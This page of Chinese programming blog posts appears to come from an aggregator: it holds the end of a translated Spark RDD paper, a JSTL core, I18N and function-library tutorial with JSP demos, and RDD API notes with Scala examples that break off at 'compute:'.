Lineage。我们通过参考[6]到[10]做过调研，在科学计算和数据库领域，对于一些应用，如需要解释结果以及允许被重新生成、工作流中发现了bug或者数据集丢失需要重新处理数据，表示数据的Lineage和原始信息一直以来都是一个研究课题。RDD提供了一个受限的编程模型，在这个模型中使用细粒度的Lineage来表示是非常容易的，因此它可以被用于容错。

缓存系统。Nectar[14]能够通过识别带有程序分析的子表达式，跨DryadLINQ作业重用中间结果，如果将这种能力加入到基于RDD的系统会非常有趣。但是Nectar并没有提供In-Memory缓存，也不能够让用户显式地控制应该缓存那个数据集，以及如何对其进行分区。Ciel[23]同样能够记住任务结果，但不能提供In-Memory缓存并显式控制它。

语言迭代。DryadLINQ[34]能够使用LINQ获取到表达式树然后在集群上运行，Spark系统的语言集成与它很类似。不像DryadLINQ，Spark允许用户显式地跨查询将RDD存储到内存中，并通过控制分区来优化通信。Spark支持交互式处理，但DryadLINQ却不支持。

关系数据库。从概念上看，RDD类似于数据库中的视图，缓存RDD类似于物化视图[29]。然而，数据库像DSM系统一样，允许典型地读写所有记录，通过记录操作和数据的日志来实现容错，还需要花费额外的开销来维护一致性。RDD编程模型通过增加更多限制来避免这些开销。

9. 总结

我们提出的RDD是一个面向，运行在普通商用机集群之上并行数据处理应用的分布式内存抽象。RDD广泛支持基于工作集的应用，包括迭代式机器学习和图算法，还有交互式数据挖掘，然而它保留了数据流模型中引人注目的特点，如自动容错恢复，处理执行进度落后的任务，以及感知调度。它是通过限制编程模型，进而允许高效地重建RDD分区来实现的。RDD实现处理迭代式作业的速度超过Hadoop大约20倍，而且还能够交互式查询数百G数据。

致谢

首先感谢Spark用户，包括TimothyHunter、Lester Mackey、Dilip Joseph、JibinZhan和Teodor Moldovan，他们在真实的应用中使用Spark，提出了宝贵的建议，同时也发现了一些新的研究挑战。这次研究离不开以下组织或团体的大力支持：BerkeleyAMP Lab创立赞助者Google和SAP，AMPLab赞助者Amazon Web Services、Cloudera、Huawei、IBM、Intel、Microsoft、NEC、NetApp和VMWare，国家配套资金加州MICRO项目（助学金06-152，07-010），国家自然科学基金（批准CNS-0509559），加州大学工业/大学合作研究项目（UC Discovery）授予的COM07-10240，以及自然科学和加拿大工程研究理事会。

参考

[1] Amazon EC2.http://aws.amazon.com/ec2.
[2] Apache Hadoop. http://hadoop.apache.org.
[3] Apache Hive. http://hadoop.apache.org/hive.
[4] Applications powered by Hadoop. http://wiki.apache.org/hadoop/PoweredBy.
[5] Scala. http://www.scala-lang.org.
[6] R. Bose and J. Frew. Lineage retrieval for scientific data processing: asurvey. ACM Computing Surveys, 37:1–28,
2005.
[7] S. Brin and L. Page.The anatomy of a large-scale hypertextual web searchengine.In WWW, 1998.
[8] Y. Bu, B. Howe, M. Balazinska, and M. D. Ernst. HaLoop: efficient iterativedata processing on large clusters. Proc. VLDB Endow., 3:285–296, September2010.
[9] C. Chambers, A. Raniwala, F. Perry, S. Adams, R. R. Henry, R. Bradshaw, andN. Weizenbaum. Flumejava: easy, efficient data-parallel pipelines. InProceedings of the 2010 ACM SIGPLAN conference on Programming language designand implementation, PLDI ’10.ACM, 2010.
[10] J. Cheney, L. Chiticariu, and W.-C.Tan. Provenance in databases: Why, how,and where. Foundations and Trends in Databases, 1(4):379–474, 2009.
[11] C. T. Chu, S. K. Kim, Y. A. Lin, Y. Yu, G. R. Bradski, A. Y. Ng, and K.Olukotun. Map-reduce for machine learning on multicore. In NIPS ’06, pages281–288. MIT Press, 2006.
[12] J. Dean and S. Ghemawat. MapReduce: Simplified data processing on largeclusters. In OSDI, 2004.
[13] J. Ekanayake, H. Li, B. Zhang, T. Gunarathne, S.-H.Bae, J. Qiu, and G.Fox. Twister: a runtime for iterative mapreduce. In HPDC ’10, 2010.
[14] P. K. Gunda, L. Ravindranath, C. A. Thekkath, Y. Yu, and L. Zhuang.Nectar: automatic management of data and computation in datacenters. In OSDI’10, 2010.
[15] T. Hastie, R. Tibshirani, and J. Friedman. The Elements of StatisticalLearning: Data Mining, Inference, and Prediction. Springer Publishing Company,New York, NY, 2009.
[16] U. Hoelzle and L. A. Barroso. The Datacenter as a Computer: AnIntroduction to the Design of Warehouse-Scale Machines. Morgan and ClaypoolPublishers, 1st edition, 2009.
[17] Mobile Millennium Project. http://traffic.berkeley.edu.
[18] M. Isard, M. Budiu, Y. Yu, A. Birrell, and D. Fetterly. Dryad: distributeddata-parallel programs from sequential building blocks. In EuroSys 07, 2007.
[19] A.-M. Kermarrec, G. Cabillic, A. Gefflaut, C. Morin, and I. Puaut. Arecoverable distributed shared memory integrating coherence and recoverability.In FTCS ’95, 1995.
[20] S. Y. Ko, I. Hoque, B. Cho, and I. Gupta. On availability of intermediatedata in cloud computations.In HotOS
’09, 2009.
[21] G. Malewicz, M. H. Austern, A. J. Bik, J. C. Dehnert, I. Horn, N. Leiser,and G. Czajkowski. Pregel: a system for large-scale graph processing. InSIGMOD, pages 135–146, 2010.
[22] S. Melnik, A. Gubarev, J. J. Long, G. Romer, S. Shivakumar, M. Tolton, andT. Vassilakis. Dremel: interactive analysis of web-scale datasets. Proc. VLDBEndow., 3:330–339, Sept 2010.
[23] D. G. Murray, M. Schwarzkopf, C. Smowton, S. Smith, A. Madhavapeddy, andS. Hand. Ciel: a universal execution engine for distributed data-flowcomputing. In NSDI, 2011.
[24] B. Nitzberg and V. Lo. Distributed shared memory: a survey of issues andalgorithms. Computer, 24(8):52–60, aug 1991.
[25] C. Olston, B. Reed, U. Srivastava, R. Kumar, and A. Tomkins. Pig latin: anot-so-foreign language for data processing. In SIGMOD ’08, pages 1099–1110.
[26] J. Ousterhout, P. Agrawal, D. Erickson, C. Kozyrakis, J. Leverich, D. Mazi` eres, S. Mitra, A. Narayanan, G. Parulkar, M. Rosenblum, S. M. Rumble, E.Stratmann, and R. Stutsman. The case for RAMClouds: scalable high-performancestorage entirely in dram. SIGOPS Oper. Syst. Rev., 43:92–105, Jan 2010.
[27] D. Peng and F. Dabek. Large-scale incremental processing using distributedtransactions and notifications. In OSDI 2010.
[28] R. Power and J. Li. Piccolo: Building fast, distributed programs withpartitioned tables. In Proc. OSDI 2010,
2010.
[29] R. Ramakrishnan and J. Gehrke.Database Management Systems. McGraw-Hill,Inc., 3 edition, 2003.
[30] D. Spiewak and T. Zhao. ScalaQL: Language-integrated database queries forscala. In SLE, pages 154–163, 2009.
[31] K. Thomas, C. Grier, J. Ma, V. Paxson, and D. Song. Design and evaluationof a real-time URL spam filtering service. In IEEE Symposium on Security andPrivacy, 2011.
[32] L. G. Valiant. A bridging model for parallel computation.Commun. ACM,33:103–111, August 1990.
[33] J. W. Young. A first order approximation to the optimum checkpointinterval.Commun. ACM, 17:530–531, Sept 1974.
[34] Y. Yu, M. Isard, D. Fetterly, M. Budiu, U. Erlingsson, P. K. Gunda, and J.Currey. DryadLINQ: A system for general-purpose distributed data-parallelcomputing using a high-level language. In OSDI ’08, 2008.

作者：china_demon 发表于2016/8/1 4:04:59 原文链接

阅读：36 评论：0 查看评论

↧

Web---JSTL(Java标准标签库)-Core核心标签库、I18N国际化、函数库

August 1, 2016, 4:21 am

≫ Next: RDD学习笔记

≪ Previous: RDD：基于内存的集群计算容错抽象

前面为JSTL中的常用EL函数，后面的为具体演示实例！

JSTL简介：

JSTL(Java Standard Tag Library) –Java标准标签库。
SUN公司制定的一套标准标签库的规范。
JSTL标签库，是由一些Java类组成的。

JSTL组成：

JSTL –Core 核心标签库。重点
JSTL – I18N －国际化标签库。Internationalization- I18N
JSTL – SQL – 数据库操作标签(有悖于MVC设计模式),现在都不用这个。
JSTL － Functions – 函数库。
JSTL － XML ，对XML的操作(同SQL标签-有悖于MVC设计模式)，现在都不用这个。

JSTL核心标签库：

使用JSTL核心标签：
如果你的Web项目是基于JavaEE2.5或以上的。可以在你项目的任意页面上通过<%@ taglib 指令使用JSTL的核心标签库。

<%@ taglib uri="http://java.sun.com/jsp/jstl/core"  prefix="c"%>

uri是引用标签库的资源定位符，并不代表一个实际的地址。
Prefix是自定义的前缀。

如果你的项目是JavaEE2.5以下的项目，必须在在你项目中的lib目录下，存在以下两个jar文件为：
Jstl.jar、standard.jar
在上面的包中，存在着jstl的tld文件，用于描述jstl标签的属性、名称、资源等信息。
程序就是通过这个tld文件找到相关java类以供运行的。
然后再在任意的JSP页面通过指令导入jstl.

JSTL-Core一共包含以下几个子标签：

<c:out> ${name}    输出标签
<c:set>         pageContext.setAttirbute(key,value,scope);  声明标签
C:remove        删除某个范畴内的数据
<c:if>          判断c:else,c:elsfif
<c:choose><c:when><c:otherwise> 判断分枝c:if,c:else if c:
<c:forEach>     遍历
<c:forTokens>   分隔
<c:import>      导入其他资源,相当于动态包含共享同一个request
<c:url>  -      重写url
<c:redirect>    重定向  response.sendRedirect(‘’..)

JSTL标签－out：

属性名         可选值                          说明
value   EL表达式、java表达式、或直接字符串    需要输出的内容
escapeXml    true | false     是否将html转成&lt;&gt;&quat;等输出。
default        默认值          如果value内容不存在时则输出默认值

<c:out  value=…/>用于在页面上输出结果。
<c:out value=“${requestScope.name}”/> -将request中的name值输出
<c:out value=“${param.username}”/> - 用于将参数输出到页面上。
<c:out value=“${name}” default=“hello”/>从page到application开始查找，如果没有找到，就显示默认值hello.
另一种设置默认值的方式：
<c:out value=“${name}”>
Default-value-默认值。
</c:out>
只有当要求的信息为null或不存在时才会输出默认值。
excapeXml属性：默认值为true,用于将html等标签转换成&lt;等转换元素，示例：
 <%
     String name="<font color='red'>Red</font>";
      pageContext.setAttribute("name",name);
  %>
<c:out value=“${name}” escapeXml=“false”></c:out> 不对xml或html进行转换，直接输出，这样就会在页面上看到红色的Red字符，因为浏览器会解析html数据。

JSTL-Core的演示：(通常命名为c命名空间)

—–jstl.jsp:

<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>

<%@taglib uri="http://java.sun.com/jsp/jstl/core"  prefix="c" %>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
  <head>
  </head>

  <body>
      <h1>JSTL技术演示</h1>

      <!-- c:out -->
      <%
        pageContext.setAttribute("name", "Tom");
        pageContext.setAttribute("name2", "<font color='red'>Tom</font>");
      %>
      <c:out value="${name}"></c:out><br/>

      ${name}<br/>

      <c:out value="${name2}" escapeXml="true" /><br/>
      ${name2}<br/>

      <!-- c:if -->
      <c:if test="${20>10}" var="boo" scope="session">
        OKOK<br/>
      </c:if>
      <!-- 想要用if-else 就这样再用一句 -->
      <c:if test="${!boo}">
        NONO<br/>
      </c:if>

      <br/><!-- 用El中的问号表达式能输出简单的if-else -->
      ${ 20>10?"yes":"no" }<br/>

      <hr/>
      <!-- forEach -->
      <%
        List list = new ArrayList();
        list.add("aaaaa111");
        list.add("bbbbb222");
        list.add(200);
        list.add(100);
        request.setAttribute("list", list);
      %>
      <table border="1px">
        <c:forEach items="${list}" var="li">
            <tr> <td>:: ${li}</td>  </tr>
        </c:forEach>
      </table>

      <%
        Map<String,Object> map = new HashMap<String,Object>();
        map.put("name", "Pose");
        map.put("age", 55);
        map.put("tel", "12345678911");
        pageContext.setAttribute("map", map);     
      %>
      <br/>
      <c:forEach items="${map}" var="m">
        ${m.key} = ${m.value}<br/>
      </c:forEach>

      <%
        String strs[] = {"aaa","bbb","ccc","ddd"};
        pageContext.setAttribute("strs", strs);
      %>
      <br/>
      <c:forEach items="${strs}" var="str">
        ${str},      
      </c:forEach>
      <br/>

      <h3>看看forEach标签中的varStatus属性---idx.index是输出元素的下标(从begin开始的)，idx.count是元素的计数(从1开始)</h3>
      <c:forEach items="${strs}" var="str" varStatus="idx">
        ${str}---index = ${idx.index} --- count=${idx.count}<br/>       
      </c:forEach>

      <!-- forEach的普通循环功能 -->
      <c:forEach begin="20" end="40" var="i" step="2" varStatus="idx">
        ${i} -- ${idx.index} -- ${idx.count}<br/>
      </c:forEach>

      <br/>
      <!-- c:set设置属性，默认作用域：pageScope -->
      <c:set var="aa" value="abc123" />
      <c:set var="aa" value="cccc222" scope="request"/>
      ${aa},${requestScope.aa}<br/>

      <br/>

      <!-- c:remove 删除属性，默认作用域:pageScope,request等4个容器！ -->
      <!-- 也就是，如果不设置作用域(scope属性),则那4个容器中的属性都会被清除，如果写了，则只清除指定作用域的属性 -->
      <c:remove var="aa" scope="request"/>
      ${aa},${requestScope.aa}<br/>

      <!-- c:choose,c:when,c:otherwise  -->
      <!-- 类似Java中的switch-case-default而且每项自动带break -->
      <c:set var="score" value="98"></c:set>
      <c:choose>
        <c:when test="${score>=90}">
            优秀
        </c:when>
        <c:when test="${score>=80}">
            良好
        </c:when>
        <c:when test="${score>=70}">
            中等
        </c:when>
        <c:otherwise>
            不合格         
        </c:otherwise>
      </c:choose>

      <br/>
      <!-- c:forTokens 用分隔符去拆分字符串 -->
      <c:forTokens items="aa,ds,sdf,df,dddd,sss" delims="," var="str">
        ${str}&nbsp;
      </c:forTokens>
      <br/>

      <!-- c:import 导入资源，相当于动态包含，共享同一个request，但是在不同的类 -->
      <c:import url="/jsps/b.jsp"></c:import>
      <br/>

      <!-- c:redirect 重定向，相当于response.sendRedirect(...) -->
      <%-- 
      <c:redirect url="/jsps/a.jsp"></c:redirect>
      --%>


      <br/><br/><br/><br/>
  </body>
</html>

—–b.jsp:

<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
  <head>
  </head>

  <body>
    <h3>这是被动态导入的页面内容...b.jsp...</h3>
  </body>
</html>

a.jsp就不写出来了，那个只是为了演示一些JSTL的重定向。a.jsp的源码没意义。

—–演示结果：

JSTL中的国际化–I18N:

在演示JSTL的国际化之前，我们先用java的国际化过渡下~

首先在src目录下配好这3个文件:

依次设置值：(空行表示是另外一个文件中了，一共3文件)

welcome=welcome you---US
time=this time is:---US

welcome=\u6B22\u8FCE\u4F60---CN
time=\u73B0\u5728\u65F6\u95F4\u662F\uFF1A---CN

welcome=welcome
time=this time is:

I18nDemo.java

package cn.hncu.i18n;

import java.util.Locale;
import java.util.ResourceBundle;

public class I18nDemo {

    public static void main(String[] args){
        //参数是：baseName--本例指的是资源文件名是：msg.*.properties
        //ResourceBundle rd = ResourceBundle.getBundle("msg");//输出：欢迎你---CN:::现在时间是：---CN   //读取的是:msg_zh_CN.properties
        //ResourceBundle rd = ResourceBundle.getBundle("msg",Locale.US);//输出：welcome you---US:::this time is:---US   //读取的是:msg_en_US.properties
        ResourceBundle rd = ResourceBundle.getBundle("msg",Locale.CANADA);////输出：欢迎你---CN:::现在时间是：---CN   //读取的是:msg_zh_CN.properties
        //因为我们的是中文系统.如果没找到对应语种的资源文件(如果不存在时，会根据系统的国家语种再找一遍,如果还没有)，则是读取默认的:msg.properties
        System.out.println(rd.getString("welcome")+":::"+rd.getString("time"));
    }
}

通过上面Java的演示我们应该猜得到，SJTL的国际化应该和这个其实差不了多少的，毕竟jsp最后是翻译成Java的。

I18N标签简介：

I18N是Internationalization的简称，因为I到N之间有18个字符所以叫i18n。

在java的核心库当中，提供了对i18n的支持，java.util.Locale类是最重要的i18n相关类。
首先介绍一下Locale类：
获取Locale类的实例，有以下几种方式：
Locale ch = new Locale(“zh”,”CN”);
Locale ch = Locale.CHINA;
或获取默认值：
Locale zh = Locale.getDefault();
然后可以通过以下方法输出语言和国家：
getLanguage
getCountry

Java.util.ResourceBundle类，用于管理和Locale相关的资源的功能。
ResourceBundle类提供了两个方法，用于创建ResourceBundle对像的静态工厂方法：
getBundle(String baseName)—通过此方法获取资源文件的名称
getBundle(String baseName,Locale locale);
参数中的baseName是资源文件的名称，资源文件通常以properties为扩展名。

资源文件的命名规则如下：
默认资源文件：resources.properties
英文资源文件：resources_en_US.properties
中文资源文件：resources_zh_CN.properties

演示代码：

再准备2个资源文件：

里面分别只设：

address=beijing

address=\u5317\u4EAC

i18n.jsp:

<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>

<%@taglib uri="http://java.sun.com/jsp/jstl/core" prefix="c" %>
<%@taglib uri="http://java.sun.com/jsp/jstl/fmt" prefix="fmt" %>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
  <head>
    <fmt:setLocale value="zh_CN"/>
    <fmt:setBundle basename="msg"/>
    <!-- 如果是真正的搞国际化，应该把要设置Locale和Bundle的代码放在head标签中，页面只负责显示 -->
  </head>

  <body>
    张三，<fmt:message key="welcome"></fmt:message>
    <fmt:message key="time" /> 2016-**-**
    <br/><hr/>
    <!-- 相比上面的版本，把国家语种用参数来进行传递了 -->
    <a href="?loc=en_US">English</a><!-- 这里href="?***" 直接加问号，就表示当前页面 -->
    <a href="?loc=zh_CN">中文</a>
    <fmt:setLocale value="${param.loc}"/>
    <fmt:setBundle basename="msg"/>
    张三，<fmt:message key="welcome"></fmt:message>
    <fmt:message key="time" /> 2016-**-**

    <br/><hr/>
    <!-- 再演示一下多个资源的情况，第二个资源及以后都必须取别名(变量名)。前面没取变量名的那个叫默认资源 -->
    <fmt:setBundle basename="a" var="aaa" scope="session"/>
    <!-- 如果有多个页面需要使用这个,那么把作用域设置成session就可以了 -->

    张三，<fmt:message key="welcome"></fmt:message>
    <fmt:message key="time" /> 2016-**-**
    <br/><br/>
    <%-- 如果从非默认的资源中读取，那么得指定资源的别名这里是：aaa,得设置成：bundle="${aaa}"。如果没有指定名称，那么就是从默认的资源读取 --%>
    <fmt:message key="address" bundle="${aaa}"></fmt:message>
    <br/><br/>

    <a href='<c:url value="/jsps/c.jsp"></c:url>'>到网站的其他页面去看看~</a>

  </body>
</html>

c.jsp:

<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>

<%@taglib uri="http://java.sun.com/jsp/jstl/fmt"  prefix="fmt"%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
  <head>
  </head>

  <body>
    <!-- 从作用域是session的资源中读取 -->
    <fmt:message key="address" bundle="${aaa}"></fmt:message>
    <!-- i18n中aaa设的loc是什么这里就显示那个国家语言的资源文件 -->
  </body>
</html>

演示结果：

选择中文：

当然，现在很多网站都不是这样来做国际化的，而是准备多套版本的网站，你点什么语言，我就给你跳到对应语言的网站去。
这样有一个很明显的不好，如果语种很多呢？难道准备那么多套网站，显然是不合理的，而用I18N只需要我们有一个网站模板，读取属性，配置对应的语种资源文件就可以了。在语种很多的情况下方便很多，架构当然无论是什么情况下，都是这个好些的。

JSTL中的常用EL函数

由于在JSP页面中显示数据时，经常需要对显示的字符串进行处理，SUN公司针对于一些常见处理定义了一套EL函数库供开发者使用。
这些EL函数在JSTL开发包中进行描述，因此在JSP页面中使用SUN公司的EL函数库，需要导入JSTL开发包，并在页面中导入EL函数库，
如下所示：(我们完全可以将JSTLl理解成EL函数库)
在页面中使用JSTL定义的EL函数：

<%@taglib uri="http://java.sun.com/jsp/jstl/functions" prefix="fn"%>

fn:toLowerCase

fn:toLowerCase函数将一个字符串中包含的所有字符转换为小写形式，并返回转换后的字符串，它接收一个字符串类型的参数，例如
fn:toLowerCase(“Www.IT315.org”) 的返回值为字符串“www.it315.org”
fn:toLowerCase(“”)的返回值为空字符串

fn:toUpperCase

fn:toUpperCase函数将一个字符串中包含的所有字符转换为大写形式，并返回转换后的字符串，它接收一个字符串类型的参数。例如：
fn:toUpperCase(“Www.IT315.org”) 的返回值为字符串“WWW.IT315.ORG”
fn:toUpperCase(“”)的返回值为空字符串

fn:trim

fn:trim函数删除一个字符串的首尾的空格，并返回删除空格后的结果字符串，它接收一个字符串类型的参数。需要注意的是，fn:trim函数不能删除字符串中间位置的空格。
例如，fn:trim(” www.it 315.org “) 的返回值为字符串“www.it 315.org”。

fn:length

fn:length函数返回一个集合或数组对象中包含的元素的个数，或返回一个字符串中包含的字符的个数，返回值为int类型。

fn:length函数接收一个参数，这个参数可以是<c:forEach>标签的items属性支持的任何类型，包括任意类型的数组、java.util.Collection、java.util.Iterator、java.util.Enumeration、java.util.Map等类的实例对象和字符串。

如果fn:length函数的参数为null或者是元素个数为0的集合或数组对象，则函数返回0；如果参数是空字符串，则函数返回0。

fn:split

fn:split函数以指定字符串作为分隔符，将一个字符串分割成字符串数组并返回这个字符串数组。

fn:split函数接收两个字符串类型的参数，第一个参数表示要分割的字符串，第二个参数表示作为分隔符的字符串。

例如，fn:split(“www.it315.org”, “.”)[1]的返回值为字符串“it315”。

fn:join

fn:join函数以一个字符串作为分隔符，将一个字符串数组中的所有元素合并为一个字符串并返回合并后的结果字符串。fn:join函数接收两个参数，第一个参数是要操作的字符串数组，第二个参数是作为分隔符的字符串。

如果fn:join函数的第二个参数是空字符串，则fn:join函数的返回值直接将元素连接起来。
例如：
假设stringArray是保存在Web域中的一个属性，它表示一个值为{“www”,”it315”,”org”}的字符串数组，则fn:join(stringArray, “.”)返回字符串“www.it315.org”
fn:join(fn:split(“www,it315,org”, “,”), “.”) 的返回值为字符串“www.it315.org”

fn:indexOf

fn:indexOf函数返回指定字符串在一个字符串中第一次出现的索引值，返回值为int类型。
fn:indexOf函数接收两个字符串类型的参数，如果第一个参数字符串中包含第二个参数字符串，那么，不管第二个参数字符串在第一个参数字符串中出现几次，fn:indexOf函数总是返回第一次出现的索引值；
如果第一个参数中不包含第二个参数，则fn:indexOf函数返回-1。
如果第二个参数为空字符串，则fn:indexOf函数总是返回0。
例如：
fn:indexOf(“www.it315.org”,”t3”) 的返回值为5

fn:contains

fn:contains函数检测一个字符串中是否包含指定的字符串，返回值为布尔类型。

fn:contains函数在比较两个字符串是否相等时是大小写敏感的。
fn:contains函数接收两个字符串类型的参数，如果第一个参数字符串中包含第二个参数字符串，则fn:contains函数返回true，否则返回false。

如果第二个参数的值为空字符串，则fn:contains函数总是返回true。实际上，fn:contains(string, substring)等价于fn:indexOf(string, substring) != -1。

如果想用忽略大小的EL函数：
那么就用：fn:containsIgnoreCase –参数和fn:contains函数一样

fn:startsWith

fn:startsWith函数用于检测一个字符串是否是以指定字符串开始的，返回值为布尔类型。

fn:startsWith函数接收两个字符串类型的参数，如果第一个参数字符串以第二个参数字符串开始，则函数返回true，否则函数返回false。如果第二个参数为空字符串，则fn:startsWith函数总是返回true。例如：

fn:startsWith(“www.it315.org”,”it315”)的返回值为false

与之对应的EL函数：fn:endsWith

fn:replace

fn:replace函数将一个字符串中包含的指定子字符串替换为其它的指定字符串，并返回替换后的结果字符串。fn:replace方法接收三个字符串类型的参数，第一个参数表示要操作的源字符串，第二个参数表示源字符串中要被替换的子字符串，第三个参数表示要被替换成的字符串。例如：

fn:replace(“www it315 org”, ” “, “.”)的返回值为字符串“www.it315.org”

fn:substring

fn:substring函数用于截取一个字符串的子字符串并返回截取到的子字符串。fn:substring函数接收三个参数，
第一个参数是用于指定要操作的源字符串，
第二个参数是用于指定截取子字符串开始的索引值，
第三个参数是用于指定截取子字符串结束的索引值，第二个参数和第三个参数都是int类型，其值都从0开始。例如：

fn:substring(“www.it315.org”, 4, 9) 的返回值为字符串“it315”

fn:substringAfter

fn:substringAfter函数用于截取并返回一个字符串中的指定子字符串第一次出现之后的子字符串。fn:substringAfter函数接收两个字符串类型的参数，第一个参数表示要操作的源字符串，第二个参数表示指定的子字符串，例如：

fn:substringAfter(“www.it315.org”, “.”)的返回值为字符串“it315.org”。

与之对应的EL函数为：fn:substringBefore

这里我只演示几个常用的函数：

演示代码：

fn.jsp:

<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>

<%@taglib uri="http://java.sun.com/jsp/jstl/core" prefix="c" %>
<%@taglib uri="http://java.sun.com/jsp/jstl/functions" prefix="fn" %>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
  <head>
  </head>

  <body>
    <c:set value="hello word function" var="str"></c:set>
    ${fn:indexOf(str,"wor")}<br/><br/>
    ${fn:contains(str,"Func")}<br/><br/>
    ${fn:containsIgnoreCase(str,"Func")}<br/><br/>
    ${fn:trim(str).length()}<br/>
  </body>
</html>

演示结果：

${fn:indexOf(str,"wor")}  //从0开始第6个开始匹配上了wor，所以输出是：6
${fn:contains(str,"Func")} //区别大小写，str中不包含字符串"Func" ,输出为：false
${fn:containsIgnoreCase(str,"Func")}//不区分大小写，str中包含字符串"func"，输出位：true
${fn:trim(str).length()} //trim()返回去掉字符串首尾的空格length()返回字符串的长度"hello word function"---19

作者：qq_26525215 发表于2016/8/1 4:21:59 原文链接

阅读：61 评论：0 查看评论

↧

RDD学习笔记

August 1, 2016, 4:29 am

≫ Next: 不能共情你还当什么领导

≪ Previous: Web---JSTL(Java标准标签库)-Core核心标签库、I18N国际化、函数库

1. 驱动程序（driver program）----> 运行main行数

共享变量:有的时候在不同节点上,需要同时运行一系列的任务,将每一个函数中用到的变量进行共享

1.广播变量:缓存到各个节点的内存中,而不是task中

2.累加器:只能用于加法的变量

Master URLs:

local:本地

local[K]:K个线程进行并行运算

aggregate:

函数有三个入参,一是初始值ZeroValue,二是seqOp,三为combOp.

seqOp seqOp会被并行执行,具体由各个executor上的task来完成计算

combOpcombOp则是串行执行, 其中combOp操作在JobWaiter的taskSucceeded函数中被调用

val z = sc.parallelize(List(1,2,3,4,5,6), 2)

z.aggregate(0)(math.max(_, _), _ + _)

res40: Int = 9

val z =sc.parallelize(List("a","b","c","d","e","f"),2)

z.aggregate("")(_ + _, _+_)

res115: String = abcdef

cartesian:

生成笛卡尔积:

def cartesian[U: ClassTag](other: RDD[U]): RDD[(T, U)]

coalesce:

重新分区:

def coalesce ( numPartitions : Int , shuffle : Boolean= false ): RDD [T]

val y = sc.parallelize(1 to 10, 10)

val z = y.coalesce(2, false)

z.partitions.length

res9: Int = 2

cogroup:

一个据听说很强大的功能,最多允许三个value,键值自己会共享,不能够太多组合

Listing Variants

def cogroup[W](other: RDD[(K, W)]): RDD[(K, (Seq[V],Seq[W]))]

def cogroup[W](other: RDD[(K, W)], numPartitions:Int): RDD[(K, (Seq[V], Seq[W]))]

def cogroup[W](other: RDD[(K, W)], partitioner:Partitioner): RDD[(K, (Seq[V], Seq[W]))]

def cogroup[W1, W2](other1: RDD[(K, W1)], other2:RDD[(K, W2)]): RDD[(K, (Seq[V], Seq[W1], Seq[W2]))]

def cogroup[W1, W2](other1: RDD[(K, W1)], other2:RDD[(K, W2)], numPartitions: Int): RDD[(K, (Seq[V], Seq[W1], Seq[W2]))]

def cogroup[W1, W2](other1: RDD[(K, W1)], other2:RDD[(K, W2)], partitioner: Partitioner): RDD[(K, (Seq[V], Seq[W1], Seq[W2]))]

def groupWith[W](other: RDD[(K, W)]): RDD[(K, (Seq[V],Seq[W]))]

def groupWith[W1, W2](other1: RDD[(K, W1)], other2:RDD[(K, W2)]): RDD[(K, (Seq[V], Seq[W1], Seq[W2]))]

Examples

val a = sc.parallelize(List(1, 2, 1, 3), 1)

val b = a.map((_, "b"))

val c = a.map((_, "c"))

b.cogroup(c).collect

res7: Array[(Int, (Seq[String], Seq[String]))] =Array(

(2,(ArrayBuffer(b),ArrayBuffer(c))),

(3,(ArrayBuffer(b),ArrayBuffer(c))),

(1,(ArrayBuffer(b, b),ArrayBuffer(c, c)))

)

val d = a.map((_, "d"))

b.cogroup(c, d).collect

res9: Array[(Int, (Seq[String], Seq[String],Seq[String]))] = Array(

(2,(ArrayBuffer(b),ArrayBuffer(c),ArrayBuffer(d))),

(3,(ArrayBuffer(b),ArrayBuffer(c),ArrayBuffer(d))),

(1,(ArrayBuffer(b, b),ArrayBuffer(c, c),ArrayBuffer(d,d)))

)

val x = sc.parallelize(List((1, "apple"),(2, "banana"), (3, "orange"), (4, "kiwi")), 2)

val y = sc.parallelize(List((5, "computer"),(1, "laptop"), (1, "desktop"), (4, "iPad")), 2)

x.cogroup(y).collect

res23: Array[(Int, (Seq[String], Seq[String]))] =Array(

(4,(ArrayBuffer(kiwi),ArrayBuffer(iPad))),

(2,(ArrayBuffer(banana),ArrayBuffer())),

(3,(ArrayBuffer(orange),ArrayBuffer())),

(1,(ArrayBuffer(apple),ArrayBuffer(laptop, desktop))),

(5,(ArrayBuffer(),ArrayBuffer(computer))))

Collect,toArray:

转换RDD成为scala的数组

def collect(): Array[T]

def collect[U: ClassTag](f: PartialFunction[T, U]):RDD[U]

def toArray(): Array[T]

val c = sc.parallelize(List("Gnu","Cat", "Rat", "Dog", "Gnu","Rat"), 2)

c.collect

res29: Array[String] = Array(Gnu, Cat, Rat, Dog, Gnu,Rat)

collectAsMap:

类似于collect,但是key-values转换成scala的时候,保存了映射结构

def collectAsMap(): Map[K, V]

val a = sc.parallelize(List(1, 2, 1, 3), 1)

val b = a.zip(a)

b.collectAsMap

res1: scala.collection.Map[Int,Int] = Map(2 -> 2, 1-> 1, 3 -> 3)

combineByKey:

自动把相同key的整理成一个Array,最后所有的Array就由各自不同key的array组成的.

def combineByKey[C](createCombiner: V => C,mergeValue: (C, V) => C, mergeCombiners: (C, C) => C): RDD[(K, C)]

def combineByKey[C](createCombiner: V => C,mergeValue: (C, V) => C, mergeCombiners: (C, C) => C, numPartitions:Int): RDD[(K, C)]

def combineByKey[C](createCombiner: V => C,mergeValue: (C, V) => C, mergeCombiners: (C, C) => C, partitioner:Partitioner, mapSideCombine: Boolean = true, serializerClass: String = null):RDD[(K, C)]

val a =sc.parallelize(List("dog","cat","gnu","salmon","rabbit","turkey","wolf","bear","bee"),3)

val b = sc.parallelize(List(1,1,2,2,2,1,2,2,2), 3)

val c = b.zip(a)

val d = c.combineByKey(List(_), (x:List[String],y:String) => y :: x, (x:List[String], y:List[String]) => x ::: y)

d.collect

res16: Array[(Int, List[String])] = Array((1,List(cat,dog, turkey)), (2,List(gnu, rabbit, salmon, bee, bear, wolf)))

::和:::都是Array中的组合方式

compute:

